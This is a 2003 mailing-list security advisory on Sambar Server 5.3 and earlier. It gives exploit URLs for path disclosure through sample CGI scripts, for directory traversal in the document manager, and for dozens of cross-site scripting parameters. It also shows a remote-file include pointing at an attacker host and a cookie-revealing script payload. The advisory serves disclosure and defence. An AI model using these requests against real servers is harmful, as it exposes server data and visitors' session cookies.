[VulnWatch] [SCSA-012] Multiple vulnerabilities in Sambar Server

From: Gregory Le Bras | Security Corporation (gregory.lebras@security-corporation.com)
Date: 03/27/03

  • Next message: CORE Security Technologies Advisories: "[VulnWatch] CORE-2003-0306: RealPlayer PNG deflate heap corruption vulnerability"
    From: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corporation.com>
    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 27 Mar 2003 15:25:40 +0100
    
    

    ________________________________________________________________________

    Security Corporation Security Advisory [SCSA-012]
    ________________________________________________________________________

    PROGRAM: Sambar Server
    HOMEPAGE: http://www.sambar.com/
    VULNERABLE VERSIONS: 5.3 and prior
    ________________________________________________________________________

    DESCRIPTION
    ________________________________________________________________________

    "Sambar Server is the new standard in high performance multi-functional
    servers with features rivaling other commercial products selling
    separately for several hundreds of dollars. It's Winsock2 compliant Win32
    integration functions on Windows 95, Windows 98, Windows NT, Win2000,
    and XP as a service or as an application."
    (direct quote from http://sambar.jalyn.net)

    DETAILS & EXPLOITS
    ________________________________________________________________________

    ¤ Path Disclosure :

    Sambar default's installation of the CGI bin directory contains
    a testcgi.exe and a environ.pl that allows remote users to view
    information regarding the operating system and
    web server's directory.

    These vulnerabilities can be triggered by a remote user submitting
    a specially crafted HTTP request.

    - Exploits :

    http://[target]/cgi-bin/environ.pl

    http://[target]/cgi-bin/testcgi.exe

    Will produce the following output:

    - environ.pl :
    --------------

    Sambar Server CGI Environment Variables
    GATEWAY_INTERFACE: CGI/1.1
    PATH_INFO:
    PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
    QUERY_STRING:
    REMOTE_ADDR: 127.0.0.1
    REMOTE_HOST:
    REMOTE_USER:
    REQUEST_METHOD: GET
    DOCUMENT_NAME: environ.pl
    DOCUMENT_URI: /cgi-bin/environ.pl
    SCRIPT_NAME: /cgi-bin/environ.pl
    SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
    SERVER_NAME: localhost
    SERVER_PORT: 80
    SERVER_PROTOCOL: HTTP/1.1
    SERVER_SOFTWARE: SAMBAR
    CONTENT_LENGTH: 0
    CONTENT:

    - testcgi.exe :
    ---------------

    Test CGI ... Version 1.00 [ build date 8-03-97 ]

    QUERY_STRING
    PATH_INFO
    PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
    SCRIPT_NAME /cgi-bin/testcgi.exe
    SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
    DOCUMENT_ROOT C:/sambar53/docs/
    HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
    REMOTE_ADDR 127.0.0.1
    REMOTE_HOST
    SERVER_NAME localhost
    SERVER_PROTOCOL HTTP/1.1
    SERVER_SOFTWARE SAMBAR
    CONTENT_TYPE

    ----------------------------

    ¤ Directory Disclosure :

    Other security vulnerabilities was found in Sambar which allow an
    attacker to reveal the content of the files and the directories
    on the web server, even if it should not be revealed.

    These vulnerabilities can be simply exploited by requesting a
    specially crafted URL utilizing iecreate.stm and ieedit.stm
    application with a '../' appended.

    - Exploits :

    http://[target]/sysuser/docmgr/iecreate.stm?template=../

    http://[target]/sysuser/docmgr/ieedit.stm?url=../

    ----------------------------

    ¤ Cross Site Scripting :

    Many exploitable bugs was found on Sambar Server which cause script
    execution on client's computer by following a crafted url.

    This kind of attack known as "Cross-Site Scripting Vulnerability" is
    present in many section of the web site, an attacker can input
    specially crafted links and/or other malicious scripts.

    - Exploits :

    http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

    http://[target]/netutils/whodata.stm?sitename=[hostile_code]

    http://[target]/netutils/findata.stm?user=[hostile_code]

    http://[target]/netutils/findata.stm?host=[hostile_code]

    http://[target]/isapi/testisa.dll?check1=[hostile_code]

    http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

    http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

    http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

    http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

    http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

    http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

    http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

    http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

    http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

    http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

    http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

    http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

    http://[target]/cgi-bin/testcgi.exe?[hostile_code]

    - An other Cross Site Scripting can be exploited with a
    remote file where's include the hostile code like this :

    http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file
    .htm

    The hostile code could be :

    [script]alert("Cookie="+document.cookie)[/script]

    (open a window with the cookie of the visitor.)

    (replace [] by <>)

    SOLUTIONS
    ________________________________________________________________________

    No solution for the moment.

    VENDOR STATUS
    ________________________________________________________________________

    The vendor has reportedly been notified.

    LINKS
    ________________________________________________________________________

    - http://www.security-corp.org/index.php?ink=4-15-1

    - Version Française :
    http://www.security-corporation.com/index.php?id=advisories&a=012-FR

    ------------------------------------------------------------------------
    Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
    ------------------------------------------------------------------------


  • Next message: CORE Security Technologies Advisories: "[VulnWatch] CORE-2003-0306: RealPlayer PNG deflate heap corruption vulnerability"